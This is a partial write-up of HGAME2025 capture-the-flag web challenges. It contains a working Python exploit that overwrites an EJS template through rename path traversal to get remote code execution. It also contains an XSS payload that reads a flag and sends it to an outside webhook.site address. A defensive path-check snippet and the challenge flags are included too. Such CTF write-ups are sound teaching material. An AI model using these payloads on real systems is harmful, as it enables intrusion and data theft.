HGAME2025 Partial Writeup

Web

Level 24 Pacman

Rail fence cipher with 2 rails.

hgame{u_4re_pacman_m4ster}

Level 47 BandBomb

The app uses EJS templates, so an EJS file can be overwritten directly to get RCE.

import requests

def upload_evil_template(url):
    # Build the malicious EJS template
    evil_template = '''
    <%- global.process.mainModule.require('child_process').execSync('env') %>
    '''
    
    files = {
        'file': ('evil.txt', evil_template)
    }
    r = requests.post(f"{url}/upload", files=files)
    return r.json()['filename']

def move_template(url, filename):
    data = {
        'oldName': filename,
        'newName': '../../app/views/mortis.ejs'
    }
    return requests.post(f"{url}/rename", json=data)

def trigger_rce(url):
    return requests.get(f"{url}/")

def main():
    url = "http://node1.hgame.vidar.club:32025"
    
    print("[+] 上传恶意模板...")
    filename = upload_evil_template(url)
    
    print("[+] 移动模板文件...")
    move_template(url, filename)
    
    print("[+] 触发模板渲染...")
    r = trigger_rce(url)
    print(r.text)

if __name__ == "__main__":
    main()


# FLAG=hgame{@ve-mUJ1cA-HAs-BrokEn_up_BUt_wE_H@VE_UMIT4ki3c}
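The rename step works because the server joins the client-supplied newName onto the upload directory without checking where the result lands. The check below is an added example, not code from the challenge or from this write-up; `UPLOAD_DIR`, `resolveInside` and `checkRename` are hypothetical names, and the directory layout is assumed.

```javascript
const path = require('path');

// Assumed layout (not taken from the challenge source): uploads live in their
// own directory, separate from the directory Express renders views from.
const UPLOAD_DIR = '/srv/app/uploads';

// Resolve a client-supplied name against baseDir; return null if it escapes.
function resolveInside(baseDir, name) {
  if (typeof name !== 'string' || name === '' || name.includes('\0')) return null;
  const base = path.resolve(baseDir);
  const target = path.resolve(base, name);
  const rel = path.relative(base, target);
  const escapes = rel === '' || rel === '..' ||
    rel.startsWith('..' + path.sep) || path.isAbsolute(rel);
  return escapes ? null : target;
}

// Validate both sides of a rename request before fs.rename is ever called.
function checkRename(body) {
  const from = resolveInside(UPLOAD_DIR, body.oldName);
  const to = resolveInside(UPLOAD_DIR, body.newName);
  if (!from) return { ok: false, reason: 'oldName outside upload dir' };
  if (!to) return { ok: false, reason: 'newName outside upload dir' };
  return { ok: true, from, to };
}

// Constructed sample requests; the second uses the newName from the write-up.
const samples = [
  { oldName: 'a.txt', newName: 'b.txt' },
  { oldName: 'evil.txt', newName: '../../app/views/mortis.ejs' },
  { oldName: 'evil.txt', newName: '/app/views/mortis.ejs' },
  { oldName: 'evil.txt', newName: 'sub/../../views/x.ejs' },
];
for (const s of samples) console.log(JSON.stringify(s), '->', checkRename(s));
```

`path.resolve` is purely lexical, so if the upload directory can contain symlinks the resolved paths should also be compared after `fs.realpath`.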

Level 69 MysteryMessageBoard

First, brute-force the password.

XSS is exploited here; the script is attached:

<script>
fetch('http://127.0.0.1:8888/flag')
  .then(response => response.text())
  .then(data => {
    fetch('https://webhook.site/c149920f-141c-4d08-af14-1a6a58cbe3a9', {
      method: 'POST',
      body: data
    });
  });
</script>
